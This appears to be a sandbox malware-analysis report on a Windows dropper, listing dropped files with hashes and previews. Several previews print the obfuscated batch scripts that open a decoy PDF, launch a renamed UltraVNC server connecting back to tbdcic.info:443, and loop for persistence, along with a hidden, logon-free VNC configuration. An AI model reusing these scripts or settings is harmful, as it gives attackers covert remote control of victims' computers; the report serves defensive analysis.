                                                                          Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                          C:\Users\user\AppData\Local\Temp\acrocef_low\dd0a6cdc-3f75-4d67-b746-ba906b56fad4.tmp

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                          Category:dropped
                                                                          Size (bytes):1419751
                                                                          Entropy (8bit):7.976496077007677
                                                                          Encrypted:false
                                                                          SSDEEP:24576:/rwYIGNP4mOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:TwZG6bWLxBGZN3mlind9i4ufFXpAXkru
                                                                          MD5:95F182500FC92778102336D2D5AADCC8
                                                                          SHA1:BEC510B6B3D595833AF46B04C5843B95D2A0A6C9
                                                                          SHA-256:9F9C041D7EE1DA404E53022D475B9E6D5924A17C08D5FDEC58C0A1DCDCC4D4C9
                                                                          SHA-512:D7C022459486D124CC6CDACEAD8D46E16EDC472F4780A27C29D98B35AD01A9BA95F62155433264CC12C32BFF384C7ECAFCE0AC45853326CBC622AE65EE0D90BA
                                                                          Malicious:false
                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                          C:\Users\user\AppData\Local\Temp\acrocef_low\f4dcad27-c5c9-4524-8ee8-e6571c2a57de.tmp

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
                                                                          Category:dropped
                                                                          Size (bytes):1407294
                                                                          Entropy (8bit):7.97605879016224
                                                                          Encrypted:false
                                                                          SSDEEP:24576:/YkwYIGNPQbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07WWL07oXGZd:DwZG2b3mlind9i4ufFXpAXkrfUs0qWLk
                                                                          MD5:38ED8E7B44D526DDA0F3E7608AF1AFA1
                                                                          SHA1:45E30A6789382E29AC870CCF92B514FB95742C45
                                                                          SHA-256:7B277E2332AE55A014D8C37CCC879D165E33315437F6197BEB153CD75E4EFBBF
                                                                          SHA-512:7169B1E4B2895A91FA0FBE4297CB70BE56D733084653334BB4E8421382F8F761DAD11B5D87277E0286A7C16CB53A2C79F96BB45F433D776E82A7CF45EA25121C
                                                                          Malicious:false
                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                          C:\Users\user\Downloads\Lom.pdf

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:PDF document, version 1.5 (zip deflate encoded)
                                                                          Category:dropped
                                                                          Size (bytes):605114
                                                                          Entropy (8bit):7.931189302613814
                                                                          Encrypted:false
                                                                          SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                                          MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                                          SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                                          SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                                          SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                                          Malicious:false
                                                                          Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.

                                                                          C:\Windows\Tasks\3889122.Khe9oLY

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:DOS batch file, ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):503
                                                                          Entropy (8bit):5.353292454999417
                                                                          Encrypted:false
                                                                          SSDEEP:12:5YVJl5uPdbHjjQxSyQL+kKqWuocWFfH61w26SgPQmPZC:gl5ubEpo+kKIpOP2g50
                                                                          MD5:41F0189B83E9D493B86D7182B3514F9D
                                                                          SHA1:D4EC6020DE07E7D10552189CE4025B220467A522
                                                                          SHA-256:7653F9CB0A81E850998E4E171FC72B99765F198A0E5CA2AF51EE698137E242FA
                                                                          SHA-512:AA941D46D50737B3A8179C27631814852BAE90601349D6BE7B769486CF6189254209758183BC59B34DE20BCC64047AA45AFE62104B08E0C6413753CCED55CC92
                                                                          Malicious:false
                                                                          Preview:@echo off.setlocal enabledelayedexpansion.set QEy79=browser_sn.set Mkr26=co.set ReO81=nhost.set dUEeo=443.set wP5sf=%COMPUTERNAME%.set LtQEq=co.set Eqm2m=nne.set wapw9=ct.set Gruna=tbdcic.info.set oSLdS=exe.set jSEQA=autore.set HaGkC=194.87.252.28.timeout /t 1.taskkill /f /im %QEy79%.%oSLdS% .timeout /t 2.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% .timeout /t 8.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% -%jSEQA%%LtQEq%%Eqm2m%%wapw9% -id:%wP5sf%_Jd0Qd -%LtQEq%%Eqm2m%%wapw9% %Gruna%:443.timeout /t 4.exit.

                                                                          C:\Windows\Tasks\3889122.cmd

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:DOS batch file, ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):503
                                                                          Entropy (8bit):5.353292454999417
                                                                          Encrypted:false
                                                                          SSDEEP:12:5YVJl5uPdbHjjQxSyQL+kKqWuocWFfH61w26SgPQmPZC:gl5ubEpo+kKIpOP2g50
                                                                          MD5:41F0189B83E9D493B86D7182B3514F9D
                                                                          SHA1:D4EC6020DE07E7D10552189CE4025B220467A522
                                                                          SHA-256:7653F9CB0A81E850998E4E171FC72B99765F198A0E5CA2AF51EE698137E242FA
                                                                          SHA-512:AA941D46D50737B3A8179C27631814852BAE90601349D6BE7B769486CF6189254209758183BC59B34DE20BCC64047AA45AFE62104B08E0C6413753CCED55CC92
                                                                          Malicious:false
                                                                          Preview:@echo off.setlocal enabledelayedexpansion.set QEy79=browser_sn.set Mkr26=co.set ReO81=nhost.set dUEeo=443.set wP5sf=%COMPUTERNAME%.set LtQEq=co.set Eqm2m=nne.set wapw9=ct.set Gruna=tbdcic.info.set oSLdS=exe.set jSEQA=autore.set HaGkC=194.87.252.28.timeout /t 1.taskkill /f /im %QEy79%.%oSLdS% .timeout /t 2.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% .timeout /t 8.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% -%jSEQA%%LtQEq%%Eqm2m%%wapw9% -id:%wP5sf%_Jd0Qd -%LtQEq%%Eqm2m%%wapw9% %Gruna%:443.timeout /t 4.exit.

                                                                          C:\Windows\Tasks\9655269573

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:DOS batch file, ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):1001
                                                                          Entropy (8bit):5.502266483327757
                                                                          Encrypted:false
                                                                          SSDEEP:24:g5byOTMorMKXGw+kMLz2NcflizT/P2bkAMlvRx/m:IOOBrMKx8TMzL9vx/m
                                                                          MD5:A99AF3E2449A048C4436329C1AF6F48F
                                                                          SHA1:06C2CB982455A7A2FCB76AE70D7C3ED6871361DA
                                                                          SHA-256:B3571E56EB1A88188B2CE9AC1E67F429E7D949D09528437A7F32689A2371CC78
                                                                          SHA-512:C8AD6E74A0C8D29538042FDC429547AD0FB7E8F96B3E5E59644EFA6837BF243E31A3193F2B385316421730733330F346498044EFC62BA152AC79FC7CD9C7A559
                                                                          Malicious:false
                                                                          Preview:@echo off.setlocal enabledelayedexpansion.set ReO81=nhost.set Eqm2m=nne.set LtQEq=co.set oSLdS=exe.set Tnd6s=Lom.set uXzAr=pdf.set Fl8oQ=raVNC.set wP5sf=%COMPUTERNAME%.set jSEQA=autore.set TNi7V=%WINDIR%\Tasks\3889122.cmd.set Gruna=tbdcic.info.set IXrxR=Jd0Qd.set M6Juw=443.set Mkr26=co.set wapw9=ct.set D7rq9=Ult.set QEy79=browser_sn.set Fr9ND=ini.timeout /t 1.copy "DygIR.vkc0f" "%HOMEPATH%\Downloads\%Tnd6s%.%uXzAr%" & start "" "%HOMEPATH%\Downloads\%Tnd6s%.%uXzAr%".timeout /t 1.taskkill /f /im %QEy79%.%oSLdS% .timeout /t 2.copy "Xv6Ya.d8LhT" "%QEy79%.%oSLdS%".timeout /t 1.copy "go3uE.OUJMA" "%D7rq9%%Fl8oQ%.%Fr9ND%".timeout /t 2.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% .timeout /t 8.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% -%jSEQA%%LtQEq%%Eqm2m%%wapw9% -id:%wP5sf%_%IXrxR% -%LtQEq%%Eqm2m%%wapw9% %Gruna%:%M6Juw%.timeout /t 2.copy "uqVb3.kkb9h" "%Mkr26%%ReO81%.%oSLdS%".timeout /t 4.:loop.if exist "%TNi7V%" (. cmd /c "%TNi7V%". timeout /t 600. goto :loop.) else (. timeout /t 42. goto :loop.).

                                                                          C:\Windows\Tasks\9655269573.cmd

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:DOS batch file, ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):1001
                                                                          Entropy (8bit):5.502266483327757
                                                                          Encrypted:false
                                                                          SSDEEP:24:g5byOTMorMKXGw+kMLz2NcflizT/P2bkAMlvRx/m:IOOBrMKx8TMzL9vx/m
                                                                          MD5:A99AF3E2449A048C4436329C1AF6F48F
                                                                          SHA1:06C2CB982455A7A2FCB76AE70D7C3ED6871361DA
                                                                          SHA-256:B3571E56EB1A88188B2CE9AC1E67F429E7D949D09528437A7F32689A2371CC78
                                                                          SHA-512:C8AD6E74A0C8D29538042FDC429547AD0FB7E8F96B3E5E59644EFA6837BF243E31A3193F2B385316421730733330F346498044EFC62BA152AC79FC7CD9C7A559
                                                                          Malicious:false
                                                                          Preview:@echo off.setlocal enabledelayedexpansion.set ReO81=nhost.set Eqm2m=nne.set LtQEq=co.set oSLdS=exe.set Tnd6s=Lom.set uXzAr=pdf.set Fl8oQ=raVNC.set wP5sf=%COMPUTERNAME%.set jSEQA=autore.set TNi7V=%WINDIR%\Tasks\3889122.cmd.set Gruna=tbdcic.info.set IXrxR=Jd0Qd.set M6Juw=443.set Mkr26=co.set wapw9=ct.set D7rq9=Ult.set QEy79=browser_sn.set Fr9ND=ini.timeout /t 1.copy "DygIR.vkc0f" "%HOMEPATH%\Downloads\%Tnd6s%.%uXzAr%" & start "" "%HOMEPATH%\Downloads\%Tnd6s%.%uXzAr%".timeout /t 1.taskkill /f /im %QEy79%.%oSLdS% .timeout /t 2.copy "Xv6Ya.d8LhT" "%QEy79%.%oSLdS%".timeout /t 1.copy "go3uE.OUJMA" "%D7rq9%%Fl8oQ%.%Fr9ND%".timeout /t 2.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% .timeout /t 8.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% -%jSEQA%%LtQEq%%Eqm2m%%wapw9% -id:%wP5sf%_%IXrxR% -%LtQEq%%Eqm2m%%wapw9% %Gruna%:%M6Juw%.timeout /t 2.copy "uqVb3.kkb9h" "%Mkr26%%ReO81%.%oSLdS%".timeout /t 4.:loop.if exist "%TNi7V%" (. cmd /c "%TNi7V%". timeout /t 600. goto :loop.) else (. timeout /t 42. goto :loop.).

                                                                          C:\Windows\Tasks\DygIR.vkc0f

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:PDF document, version 1.5 (zip deflate encoded)
                                                                          Category:dropped
                                                                          Size (bytes):605114
                                                                          Entropy (8bit):7.931189302613814
                                                                          Encrypted:false
                                                                          SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                                          MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                                          SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                                          SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                                          SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                                          Malicious:false
                                                                          Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.

                                                                          C:\Windows\Tasks\UltraVNC.ini

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:Generic INItialization configuration [admin]
                                                                          Category:dropped
                                                                          Size (bytes):858
                                                                          Entropy (8bit):5.233343202654504
                                                                          Encrypted:false
                                                                          SSDEEP:24:z/h28nCi2vMQg9KgJhuXNTxYgMei3MAKJ/nn:rh28nC2/KgJOr8eTx/n
                                                                          MD5:C55EEA597023B8C774986495ECAE5B33
                                                                          SHA1:279315CE36021D2C86AE97EBFAA528749FA89544
                                                                          SHA-256:75490184E52519B37CC1DF17AF419C260BD50575C57FFA46366A877E4FC57ACA
                                                                          SHA-512:D838DA28246C21A3A9920E05B2E5AA58321F5C08D5F18B0F372E9436641977E9A33585706A85A7F84116F27B456C5589E4D2235CB8E178F824483493F508989B
                                                                          Malicious:false
                                                                          Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=50..KeepAliveInterval=6..SocketKeepAliveTimeout=12000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0341C75FCAEB31BD2..passwd2=F2409C75FCAEB22BD2..

                                                                          C:\Windows\Tasks\Xv6Ya.d8LhT

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1945368
                                                                          Entropy (8bit):6.532894678367002
                                                                          Encrypted:false
                                                                          SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                                          MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                                          SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                                          SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                                          SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\Xv6Ya.d8LhT, Author: Joe Security
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................

                                                                          C:\Windows\Tasks\browser_sn.exe

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1945368
                                                                          Entropy (8bit):6.532894678367002
                                                                          Encrypted:false
                                                                          SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                                          MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                                          SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                                          SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                                          SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\browser_sn.exe, Author: Joe Security
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................

                                                                          C:\Windows\Tasks\conhost.exe

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):867840
                                                                          Entropy (8bit):6.386550733462827
                                                                          Encrypted:false
                                                                          SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                                          MD5:0F568F6C821565AB9FF45C7457953789
                                                                          SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                                          SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                                          SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................

                                                                          C:\Windows\Tasks\go3uE.OUJMA

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:Generic INItialization configuration [admin]
                                                                          Category:dropped
                                                                          Size (bytes):858
                                                                          Entropy (8bit):5.233343202654504
                                                                          Encrypted:false
                                                                          SSDEEP:24:z/h28nCi2vMQg9KgJhuXNTxYgMei3MAKJ/nn:rh28nC2/KgJOr8eTx/n
                                                                          MD5:C55EEA597023B8C774986495ECAE5B33
                                                                          SHA1:279315CE36021D2C86AE97EBFAA528749FA89544
                                                                          SHA-256:75490184E52519B37CC1DF17AF419C260BD50575C57FFA46366A877E4FC57ACA
                                                                          SHA-512:D838DA28246C21A3A9920E05B2E5AA58321F5C08D5F18B0F372E9436641977E9A33585706A85A7F84116F27B456C5589E4D2235CB8E178F824483493F508989B
                                                                          Malicious:false
                                                                          Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=50..KeepAliveInterval=6..SocketKeepAliveTimeout=12000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0341C75FCAEB31BD2..passwd2=F2409C75FCAEB22BD2..

                                                                          C:\Windows\Tasks\uqVb3.kkb9h

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):867840
                                                                          Entropy (8bit):6.386550733462827
                                                                          Encrypted:false
                                                                          SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                                          MD5:0F568F6C821565AB9FF45C7457953789
                                                                          SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                                          SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                                          SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):7.9513802823208
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:T8xrZb7nBL.exe
                                                                          File size:1'670'955 bytes
                                                                          MD5:1677bd5b561b890396ae1816066ca481
                                                                          SHA1:9ba4b30a162a261b27397bc1dc3736b94b786f65
                                                                          SHA256:d9c7850bde98f2a2cb586b482efd8ff0b6c959ce71f9db699a7b457d5daf5f9e
                                                                          SHA512:bac8a3d2e270caf1d00b812d480562ffced7a67d14ac45e1730fb94d5dadf7f5c5fb618133e35f4a7246d16fa53cbada05ea1671c2919973d0e9ccd4b3be3be7
                                                                          SSDEEP:24576:WKWs4Estw5N4jqjvXeBKNiVCK/A52aw08KdVUBRAWwPnA5jF0zF77/voe2D7UGxV:TFzseH4jYXeBExKYhd3Yb0zZoe2DNL
